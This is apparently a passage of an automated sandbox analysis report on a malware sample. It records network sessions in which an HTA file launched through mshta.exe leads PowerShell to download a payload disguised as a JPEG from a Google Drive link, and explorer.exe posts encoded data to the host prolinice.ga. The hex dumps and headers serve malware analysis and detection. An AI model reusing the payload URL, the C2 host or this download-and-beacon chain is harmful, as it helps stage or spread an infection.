                                                                                                                        Oct 23, 2024 08:15:42.990807056 CEST1236INData Raw: 3a 4a 46 78 d9 bd c0 47 06 63 a2 e7 43 6c 5f a3 5c e6 3f 2b e2 a7 6d 88 36 d1 ab 7a 33 cd e9 51 55 b8 03 fb 2e 0d 79 6a 86 6c 78 60 5a 8e 07 2c 38 79 4f 36 32 6e 72 7e f0 72 29 40 6c 3b 69 dd ad e7 19 f3 32 10 e2 c9 8b d5 e5 cc ae ac cf 2c b2 0d
                                                                                                                        Data Ascii: :JFxGcCl_\?+m6z3QU.yjlx`Z,8yO62nr~r)@l;i2,!a'MyPXN_k0aW,xqWbsevmBH,c:l%TM007#1<?ye-gtgcwmV`&$E^uAwI0q:<
                                                                                                                        Oct 23, 2024 08:15:42.990824938 CEST1236INData Raw: 86 fd 09 d8 a2 56 03 b9 bb 52 d2 5a 38 70 92 0a 6f 3e 66 10 29 91 14 e3 c8 e6 94 a8 a4 07 12 25 68 3e 18 de c7 0a 45 28 0f 3d 2b 64 16 02 7e ff 0f a4 b4 58 7b 10 00 8c 05 3f 8c c3 7c 9e 9b 4b 8c 69 a9 30 18 17 8f bb 36 dc 07 61 13 4b 73 3d b9 6c
                                                                                                                        Data Ascii: VRZ8po>f)%h>E(=+d~X{?|Ki06aKs=l?D7D;z6UM"iI"dioztH*{XgQlF}7u\C7:,#4QBGg 6!D6w\)85/QN|wn2+w
                                                                                                                        Oct 23, 2024 08:15:42.991014957 CEST636INData Raw: 70 7a 85 27 8f 78 0d 7a ea be c2 6f cb e2 76 e4 97 a3 c9 96 89 91 ea 3a 3f 38 2c 65 17 f7 0f 58 91 00 4f 5c d5 5b d5 e7 e3 a4 79 62 2a d3 08 62 f3 d5 fa 87 d5 e0 9e f7 7d 8b df 15 4a 12 a3 bd c2 70 b0 da 11 e2 ed 3e 8c be ec 80 d9 8a 8b 30 2b a0
                                                                                                                        Data Ascii: pz'xzov:?8,eXO\[yb*b}Jp>0+;*8-hg=hYQIHI,%07?b{Kk'BS\kV#vBc)xB6jX`#Qb'}T^^bn}vfau)Nr)<h/Dgq`?|lD~c^%
                                                                                                                        Oct 23, 2024 08:15:42.991033077 CEST1236INData Raw: 51 23 b0 7b 33 c9 fd 79 9a a6 18 e3 91 1b a0 6e 82 a5 b8 88 82 53 1c 14 4f 5b 01 31 e7 6d 82 e4 55 5b de a4 e2 46 ce 13 f0 19 82 6e e9 44 35 47 af 75 f0 c8 bd 5d ac a3 ff 35 a9 bd ef 0a 49 c2 1c 95 c9 e7 ac 95 ab f8 c7 34 c9 97 34 a6 36 ce 46 88
                                                                                                                        Data Ascii: Q#{3ynSO[1mU[FnD5Gu]5I446Fdhj9Aw)-?Uu^qrP0>ZWPH{{X.Dbd<N;}cHI3},[>q]Sz2[2"eULE{)S\fL5
                                                                                                                        Oct 23, 2024 08:15:42.991049051 CEST1236INData Raw: e6 4a 03 d0 99 7b 04 b0 bd 92 02 09 a0 2f a4 d1 95 3f a8 66 41 38 85 7f 99 76 d6 6a 2e fa 60 6a 44 6b 4a 3b 93 59 86 b6 3a 4b 30 37 5a 8f 11 18 45 17 83 82 91 5f 0d 67 8e 0e f6 92 6e 1d 74 89 12 a1 b7 11 ce 3b 07 ba 3b f6 a7 2d 78 17 73 33 d9 9a
                                                                                                                        Data Ascii: J{/?fA8vj.`jDkJ;Y:K07ZE_gnt;;-xs3~Fw0xXdw^D3~Q-]2(-OmwIKC+<ymmCx>sHXomSf%54m{gxKi.h_TK
                                                                                                                        Oct 23, 2024 08:15:42.991108894 CEST424INData Raw: df 96 5c 23 be 50 e4 5e 32 6a 02 22 0e 57 ad 8a d7 ea 2f 55 6d f8 e1 71 30 d4 c0 d6 b1 5b 56 68 86 db 24 22 14 c7 75 6c 19 5b 7f 01 65 10 03 78 34 13 ae c8 b7 b0 d2 cd 13 3a b1 86 20 cc ba f6 a4 47 81 de 12 c9 42 38 d8 68 d7 83 2c 6c 80 56 56 d0
                                                                                                                        Data Ascii: \#P^2j"W/Umq0[Vh$"ul[ex4: GB8h,lVV-^C0Z-zdzJL_`e6.g%3Jaoc%]p'P]vm]q6@3\i@Yg>48|[B\a:M-@+"ko?eQ]*6-
                                                                                                                        Oct 23, 2024 08:15:42.991153955 CEST1236INData Raw: 6e 6d 54 81 f9 01 96 b0 09 28 a6 03 2e d0 c3 6d 13 d9 81 41 46 15 0b ba f9 b3 7e 65 76 92 5d cc 1e ae a9 35 b4 41 50 5c 10 7a 7f 88 38 1a ab bb 21 b9 69 ca 04 6b ff b9 a2 96 71 4a eb 5b 56 13 2c 9e 54 5b 3f 3e 4a 0c d7 79 3b 83 74 21 4f 0a a0 14
                                                                                                                        Data Ascii: nmT(.mAF~ev]5AP\z8!ikqJ[V,T[?>Jy;t!Oj}Hxq:?Ig(TW--^rL-m\HTXd.elx 9b71SmX~io"r~L&\@[KgeK
                                                                                                                        Oct 23, 2024 08:15:42.991170883 CEST1236INData Raw: e5 e9 86 70 da e1 4f 6b 80 17 d7 ab d4 a0 08 24 67 24 e3 fe c2 c7 f6 91 d7 cc 2d 16 83 7e af 9b 2b 47 23 a5 d8 d3 76 93 1d 90 c9 11 a9 a7 7d f7 ab 8c 62 8d c9 7e 36 f4 e0 89 2f 9e df 1f 76 3e 3b ef 65 26 1a ba 08 48 9b fb ba 78 e4 ac 74 0f dc fb
                                                                                                                        Data Ascii: pOk$g$-~+G#v}b~6/v>;e&HxtE8^L4,r2T5n9nD0Sk1%o[;Wch\Zty"n*_vUL*WvNzY&k:_@qfh)[\LMj8Lcyy:_w|
                                                                                                                        Oct 23, 2024 08:15:42.991174936 CEST1236INData Raw: 8b d7 48 b1 e1 2c 0e b1 00 94 90 28 22 12 5c a6 61 15 23 03 9f 8c 53 9e 5e 78 af 1e 68 82 a5 d0 c5 00 bd e3 6d 58 26 32 0a 21 96 b8 1d 62 20 6b 52 2b 2b c2 aa 0b 00 09 bc 91 31 e1 13 79 7c f5 44 70 e0 24 fb f0 f3 2d a7 02 c9 b9 d0 fc f3 2a 57 99
                                                                                                                        Data Ascii: H,("\a#S^xhmX&2!b kR++1y|Dp$-*WThU=C~ovf# _Hy8"(~}K\BBim2q]^]%;Q\)S{n7SGzfy~~>ELv!2mQ


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        3192.168.2.104998145.91.8.152802288C:\Windows\SysWOW64\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Oct 23, 2024 08:15:47.711318016 CEST274OUTPOST /index.php HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://prolinice.ga/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 501
                                                                                                                        Host: prolinice.ga
                                                                                                                        Oct 23, 2024 08:15:47.711342096 CEST501OUTData Raw: 6e e2 e1 8b c3 47 f5 12 1a 17 b3 17 3d 2c f9 f3 a5 20 e8 24 45 f8 cc e2 f4 e8 04 6b d8 3b 46 00 35 b9 eb b0 0c ac f4 a2 12 be c4 b0 d5 ee 65 75 c5 67 5d 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 9a bd 52 eb cc 59 3b 1f d6 b2 50 4c 85 65 a4 f0 a2
                                                                                                                        Data Ascii: nG=, $Ek;F5eug]H8.6hEvRY;PLeOc~k_!z1rJC\S7W/x*>x :xGresn*q~j(vE)\1>mnW69%_Q.,})!s~VD5Ha"
                                                                                                                        Oct 23, 2024 08:15:48.833766937 CEST565INHTTP/1.1 404 Not Found
                                                                                                                        date: Wed, 23 Oct 2024 06:15:48 GMT
                                                                                                                        server: Apache/2.4.59 (Debian)
                                                                                                                        content-length: 409
                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        0192.168.2.1049772142.250.186.784436124C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-10-23 06:14:51 UTC121OUTGET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1
                                                                                                                        Host: drive.google.com
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-10-23 06:14:51 UTC1319INHTTP/1.1 303 See Other
                                                                                                                        Content-Type: application/binary
                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                        Date: Wed, 23 Oct 2024 06:14:51 GMT
                                                                                                                        Location: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-vqur_sv_ZSOBQ9jXi-SRFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                        Server: ESF
                                                                                                                        Content-Length: 0
                                                                                                                        X-XSS-Protection: 0
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                        Connection: close


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        1192.168.2.1049778142.250.185.1934436124C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-10-23 06:14:52 UTC139OUTGET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1
                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-10-23 06:14:54 UTC4884INHTTP/1.1 200 OK
                                                                                                                        Content-Type: image/jpeg
                                                                                                                        Content-Security-Policy: sandbox
                                                                                                                        Content-Security-Policy: default-src 'none'
                                                                                                                        Content-Security-Policy: frame-ancestors 'none'
                                                                                                                        X-Content-Security-Policy: sandbox
                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                                                                        Cross-Origin-Resource-Policy: same-site
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Content-Disposition: attachment; filename="new_image-new.jpg"
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Access-Control-Allow-Credentials: false
                                                                                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 2239109
                                                                                                                        Last-Modified: Mon, 21 Oct 2024 13:42:20 GMT
                                                                                                                        X-GUploader-UploadID: AHmUCY0C5D7SGfH48jXyZImHlliuC07d8qZsVLM9xTf78fwXFDtnfeQVo0JaD6dCUWAfgzhJK9W3RHa2pA
                                                                                                                        Date: Wed, 23 Oct 2024 06:14:54 GMT
                                                                                                                        Expires: Wed, 23 Oct 2024 06:14:54 GMT
                                                                                                                        Cache-Control: private, max-age=0
                                                                                                                        X-Goog-Hash: crc32c=WqxmdA==
                                                                                                                        Server: UploadServer
                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                        Connection: close
                                                                                                                        2024-10-23 06:14:54 UTC4884INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                                        Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                                        2024-10-23 06:14:54 UTC4884INData Raw: 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8 45 2e de 2f b9 cd 04 62 f1 19 03 ed 55 b5 34 6c 13 99 53 48 aa 43 28 23 68 01 89 e7 9c 98 27 46 81 d1 49 00 1d c6 fb 9c 07 6f 7c 8a 24 76 64 ec a4 5e 15 62 d3 c0 8c e5 e5 24 03 e9 02 c5 62 1a 6d 62 bb 00 cc 14 ad 81 78 71 36 e4 61 be af 8c 0c ad 42 99 26 76 51 44 9a 0a 16 b8 c5 99 19 0d 32 90 7e 23
                                                                                                                        Data Ascii: +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^}E./bU4lSHC(#h'FIo|$vd^b$bmbxq6aB&vQD2~#
                                                                                                                        2024-10-23 06:14:54 UTC46INData Raw: de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76
                                                                                                                        Data Ascii: oVuvH[J}I#k&>$"d)v
                                                                                                                        2024-10-23 06:14:54 UTC1323INData Raw: 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7 e5 81 e9 07 8b 40 da 67 d5 0f 0e d3 10 ac 29 77 3d 76 04 fe 3e c4 af e7 f0 39 da 6f 1b d3 6a 1c ef d0 c2 18 ad 85 4d ec c4 fc 8b f3 f4 ed ce 61 40 cf 14 91 b0 04 a8 24 15 27 f8 4f 0c 3f 2c a2 b4 b0 b9 da 40 ba b0 c0 30 ef 55 63 b7 be 06 9c de 2d 13 9a 1a 38 a3 b3 cb 29 6b 35 f0 2c 72 ad e3 50 00 36 f8 74 25 bd ed f9 ff 00 c5 99 f3 17 91 43 33 12 d4 7f 11 ba e7 b6 2e 18 b2 d8 8c 00 bf e2 16 0e 06 be b7 c5 22 62 a9 1e 8e 28 db 68 66 23 78 60 7d b9 6c e9 f5 9a 68 94 d2 18 d9 95 48 45 53 46 d5 6e c9 3c
                                                                                                                        Data Ascii: 96cBG,$]/3kG>M&w2C3R)!^*@g)w=v>9ojMa@$'O?,@0Uc-8)k5,rP6t%C3."b(hf#x`}lhHESFn<
                                                                                                                        2024-10-23 06:14:54 UTC1378INData Raw: 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a ea 53 53 2c 72 6d 0a b1 86 20 1e 7a fe 59 89 11 d7 6a 17 64 26 79 1a e8 90 cc 76 df c7 a0 ca b3 a3 43 24 b3 6a 7f 7b c0 45 ae 4d 77 bf 6c 67 c3 5e 72 fb 20 75 60 80 ca 55 ba 13 44 1f e7 81 53 a2 f1 b4 86 49 8c b3 20 4e 4a 89 da c8 fa 1c 57 45 ac f1 1d 44 a4 c5 aa 76 65 e4 2b 4a 7a 7d 78 cf 68 ed fb a6 b5 05 45 92 08 be 9c e7 90 d7 c4 9a
                                                                                                                        Data Ascii: E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{SS,rm zYjd&yvC$j{EMwlg^r u`UDSI NJWEDve+Jz}xhE
                                                                                                                        2024-10-23 06:14:54 UTC1378INData Raw: dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4 78 ee 01 6e c3 a6 0b f6 84 1a 2f da f4 cd 33 8d 41 69 34 c7 72 a8 51 b7 62 71 ed d3 bf 7b be 3a 66 ef d9 08 53 67 da 44 1a 69 62 f1 18 b4 4e 93 ab 23 16 45 43 10 29 60 05 03 d2 d4 a0 0a af 86 64 7d b5 d6 e9 b5 bf b4 81 3b 23 16 94 69 24 01 db 90 1a 28 d8 0e bf 1c 0d 1f da cc fe 54 1f 66 56 3d cb 1f fb 35 76 ad 81 43 8f fa 67 cc c3 ea a2
                                                                                                                        Data Ascii: Ol~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#xn/3Ai4rQbq{:fSgDibN#EC)`d};#i$(TfV=5vCg
                                                                                                                        2024-10-23 06:14:54 UTC1378INData Raw: bb 31 f7 f6 c0 cc a1 66 dd e6 1f 2c f4 17 81 d1 2f 9b 09 2e a4 b0 e3 e9 8b 3a 3c 4c cd 1d 2a 91 cf 18 c3 29 58 5a 9c d9 3e 9f 96 1e 08 8c b0 82 dc af 42 47 38 19 e1 37 37 ac 6e 1e f8 64 2c ea 50 8b 5a e2 86 72 43 20 d6 98 ca 91 10 e6 f1 98 e2 02 56 0a 59 42 8b 23 df 01 78 b4 e9 01 ad a6 db b0 c3 47 a2 56 90 52 30 0d d6 fb 64 88 77 4d bc c8 dc 9e 06 3a 6d 23 01 59 b7 11 d7 02 87 46 9a 6b 23 93 d3 e9 81 56 57 0c 03 58 06 a8 8e 70 da 98 8b 4d 13 09 58 9a a2 07 f3 c4 91 36 ea 25 46 91 89 bf 4f 15 81 05 48 73 66 fe 99 59 d0 32 6d 65 e4 64 32 32 cc 41 73 f0 bc ba 5b 0d 92 1b 61 d0 d6 02 fa 7d 3a 39 3e 9f 52 f4 38 dc 6b 21 43 bb a8 e9 95 8c 04 52 43 10 df 2c 32 12 50 6d 66 2c 7a fc 30 2f 06 8d a6 25 a4 34 3b 58 c8 96 22 d1 f4 52 cb c0 ac d4 44 56 45 f2 d8 8f 46
                                                                                                                        Data Ascii: 1f,/.:<L*)XZ>BG877nd,PZrC VYB#xGVR0dwM:m#YFk#VWXpMX6%FOHsfY2med22As[a}:9>R8k!CRC,2Pmf,z0/%4;X"RDVEF
                                                                                                                        2024-10-23 06:14:54 UTC1378INData Raw: ac 08 c8 d1 88 d5 76 ae f9 94 33 72 c4 96 05 ae c9 e4 7e 43 e2 b0 d3 48 83 99 74 f4 7b 79 e9 ff 00 ab 01 32 29 b9 26 8f b6 16 02 34 ee 25 08 c5 87 2a bb c8 03 e7 44 1f d7 0f f7 49 0c 77 be 02 4f ff 00 6f 4f fd 59 0d a4 95 63 16 d0 90 be d3 23 7e 81 b0 1a 86 59 f5 09 23 43 24 e1 4d 1d cd 2b 11 d0 58 15 c0 b3 fe 20 46 44 5a 83 3b 14 59 a6 89 55 50 bb b4 cc 6c d8 56 ef d3 93 f9 7b 62 09 a7 96 48 77 a3 42 01 3c dc aa a4 8f 88 2c 32 1f 49 22 a9 25 a1 20 2e ea 12 27 4f a3 73 80 ea 99 bc a5 f3 1a 44 2e 18 28 69 18 f2 0a f5 00 93 5c 9e dd 33 33 5c 85 67 60 58 b1 e2 d9 9a cf f7 af 9e 73 bb 36 9c 21 24 aa 12 47 3c 73 5f 9e 2c 78 04 0b a3 c9 27 02 83 83 9a be 16 e9 1c 52 33 90 29 81 e7 e5 99 4a 2c e6 e7 81 e9 61 d4 45 28 96 23 21 0c 36 fb 0c 0d 48 75 9a 52 a1 69 48
                                                                                                                        Data Ascii: v3r~CHt{y2)&4%*DIwOoOYc#~Y#C$M+X FDZ;YUPlV{bHwB<,2I"% .'OsD.(i\33\g`Xs6!$G<s_,x'R3)J,aE(#!6HuRiH
                                                                                                                        2024-10-23 06:14:54 UTC1378INData Raw: 9c 30 7b 46 1e a5 6e c7 e1 84 49 e5 8c 32 a3 6d 0c a5 58 fb 8b bc 31 d3 ba 30 66 46 a2 0d 6e 15 5d bf a6 09 d8 19 02 81 47 df 03 d0 7d 9e 56 6d 0b d3 6d 01 ec 1f a5 62 bf 68 55 9b 57 a7 0d d7 6f 1f 1f 56 5b c2 35 03 45 0c 9e 71 db 16 e5 36 db af 9b 1c 7e 78 2f 13 d4 47 ac d4 c6 da 76 de 11 4a 9d bb ab df db 03 d0 1d eb a5 2a 59 98 85 6f c5 db e1 9e 7f ec d0 65 9a 72 39 f4 0f e7 9a e7 59 12 e9 49 97 74 67 98 d4 10 c6 cd 7b 7d 33 27 c1 b7 e9 27 73 22 32 ab a8 16 55 b9 eb d0 56 03 3e 3f a7 f3 60 13 85 f5 44 68 ff 00 ba 7f eb 97 d0 f8 ac 6b e1 db a4 3c c4 84 f4 27 75 76 c7 27 96 07 86 45 91 c4 6a ca 08 69 01 0a 77 03 c0 be a7 8c f1 c2 45 86 52 a5 4b c5 7c 7a a8 10 3e 38 1e 8f 45 71 81 23 bb 7d e2 57 0c ea 1e ec 37 22 97 bf 40 0d f6 27 0b aa f1 6d 1f 87 c6 22
                                                                                                                        Data Ascii: 0{FnI2mX10fFn]G}VmmbhUWoV[5Eq6~x/GvJ*Yoer9YItg{}3''s"2UV>?`Dhk<'uv'EjiwERK|z>8Eq#}W7"@'m"
                                                                                                                        2024-10-23 06:14:54 UTC1378INData Raw: e4 9e 58 dc c8 a1 d4 44 ad d4 72 c4 ee 2c 47 16 c2 bb 67 8a fb 55 10 93 ed ee 9b 50 24 0b 1c c9 a2 0a c1 83 32 8f 22 1f 51 5f c4 07 3d c6 6b 7d 84 d4 3e 8b c6 3e d6 46 92 42 d1 a7 83 6a 9c 79 60 fa 76 95 3b 41 20 1e fc e6 27 db 14 0d f6 bd 1c 39 15 a7 d1 15 63 dc 7d de 2a c0 f4 9f b5 e9 e4 66 fb 3d e6 24 b1 ca 9a 3d 92 ab 22 a8 0d b5 18 f0 39 1c b5 73 ed 9f 39 d3 40 41 2e 25 da c3 e1 9f 58 fd b3 cb a6 6f 1d f0 5d 3e a6 49 04 50 a3 89 5d 41 69 0f 0a 68 02 40 ff 00 47 3e 63 19 73 11 0b 11 65 00 0e 08 04 1b e8 6b eb 80 16 49 4a b2 79 a5 95 81 06 85 60 df 46 15 81 f3 38 35 7e 95 be 3e 39 a4 c9 b9 76 15 28 d5 dc 7f 5c 4e 73 e4 05 56 91 c5 9a e2 bf b6 05 f4 30 9f 35 9c 92 39 b5 0d 44 9b f9 65 f5 28 eb 21 60 ea 41 ef b7 a7 eb 93 02 ed 56 70 f2 1f cb fb 64 b9 67
                                                                                                                        Data Ascii: XDr,GgUP$2"Q_=k}>>FBjy`v;A '9c}*f=$="9s9@A.%Xo]>IP]Aih@G>csekIJy`F85~>9v(\NsV059De(!`AVpdg


                                                                                                                        Click to jump to process

                                                                                                                        Click to jump to process

                                                                                                                        Click to dive into process behavior distribution

                                                                                                                        Click to jump to process

                                                                                                                        Target ID:0
                                                                                                                        Start time:02:14:35
                                                                                                                        Start date:23/10/2024
                                                                                                                        Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:mshta.exe "C:\Users\user\Desktop\veryeasythingsevermadeforcreatenewthignsbetterthigns.hta"
                                                                                                                        Imagebase:0x7a0000
                                                                                                                        File size:13'312 bytes
                                                                                                                        MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:moderate
